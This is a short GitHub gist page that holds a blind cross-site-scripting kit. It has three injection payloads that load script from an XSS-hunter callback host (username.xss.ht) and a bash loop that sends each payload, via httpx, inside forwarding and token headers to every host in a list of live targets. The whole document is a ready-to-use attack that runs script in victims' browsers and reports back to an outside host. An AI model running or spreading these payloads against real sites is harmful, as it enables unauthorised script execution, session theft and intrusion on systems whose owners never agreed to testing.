Skip to content

Instantly share code, notes, and snippets.

@Huntinex
Created August 1, 2022 13:40
Show Gist options
  • Save Huntinex/0073f69d4d021bbd8d2c06c68c49a2b3 to your computer and use it in GitHub Desktop.
Save Huntinex/0073f69d4d021bbd8d2c06c68c49a2b3 to your computer and use it in GitHub Desktop.
"><script src=https://username.xss.ht></script>
'><script src=https://username.xss.ht></script>
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')
while read bxss;do
cat alivehosts.txt | httpx \
-H "X-Forwarded-for: $bxss" -H "X-forwarded-ip: $bxss" -H "cf-connecting-ip: $bxss"
cat alivehosts.txt | httpx \
-H "X-Client-ip: $bxss" -H "X-real-ip: $bxss" -H "X-request-uri: $bxss" \
-H "X-XSRF-TOKEN: $bxss" -H "X-CSRF-TOKEN: $bxss"
done < bxss-payload.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment